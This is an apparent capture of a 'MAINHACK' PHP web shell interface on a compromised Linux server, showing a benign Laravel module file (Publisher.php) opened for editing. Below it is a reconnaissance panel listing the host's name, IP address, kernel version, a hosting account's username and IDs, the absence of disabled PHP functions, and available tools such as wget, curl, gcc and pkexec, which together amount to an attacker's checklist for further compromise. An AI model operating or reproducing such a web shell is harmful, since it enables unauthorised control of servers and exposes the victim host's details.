[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Publisher.php
<?php namespace Nwidart\Modules\Publishing; use Illuminate\Console\Command; use Nwidart\Modules\Contracts\PublisherInterface; use Nwidart\Modules\Contracts\RepositoryInterface; use Nwidart\Modules\Module; abstract class Publisher implements PublisherInterface { /** * The name of module will used. * * @var string */ protected $module; /** * The modules repository instance. * @var RepositoryInterface */ protected $repository; /** * The laravel console instance. * * @var \Illuminate\Console\Command */ protected $console; /** * The success message will displayed at console. * * @var string */ protected $success; /** * The error message will displayed at console. * * @var string */ protected $error = ''; /** * Determine whether the result message will shown in the console. * * @var bool */ protected $showMessage = true; /** * The constructor. * * @param Module $module */ public function __construct(Module $module) { $this->module = $module; } /** * Show the result message. * * @return self */ public function showMessage() { $this->showMessage = true; return $this; } /** * Hide the result message. * * @return self */ public function hideMessage() { $this->showMessage = false; return $this; } /** * Get module instance. * * @return \Nwidart\Modules\Module */ public function getModule() { return $this->module; } /** * Set modules repository instance. * @param RepositoryInterface $repository * @return $this */ public function setRepository(RepositoryInterface $repository) { $this->repository = $repository; return $this; } /** * Get modules repository instance. * * @return RepositoryInterface */ public function getRepository() { return $this->repository; } /** * Set console instance. * * @param \Illuminate\Console\Command $console * * @return $this */ public function setConsole(Command $console) { $this->console = $console; return $this; } /** * Get console instance. * * @return \Illuminate\Console\Command */ public function getConsole() { return $this->console; } /** * Get laravel filesystem instance. * * @return \Illuminate\Filesystem\Filesystem */ public function getFilesystem() { return $this->repository->getFiles(); } /** * Get destination path. * * @return string */ abstract public function getDestinationPath(); /** * Get source path. * * @return string */ abstract public function getSourcePath(); /** * Publish something. */ public function publish() { if (!$this->console instanceof Command) { $message = "The 'console' property must instance of \\Illuminate\\Console\\Command."; throw new \RuntimeException($message); } if (!$this->getFilesystem()->isDirectory($sourcePath = $this->getSourcePath())) { return; } if (!$this->getFilesystem()->isDirectory($destinationPath = $this->getDestinationPath())) { $this->getFilesystem()->makeDirectory($destinationPath, 0775, true); } if ($this->getFilesystem()->copyDirectory($sourcePath, $destinationPath)) { if ($this->showMessage === true) { $this->console->components->task($this->module->getStudlyName(), fn() => true); } } else { $this->console->components->task($this->module->getStudlyName(), fn() => false); $this->console->components->error($this->error); } } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002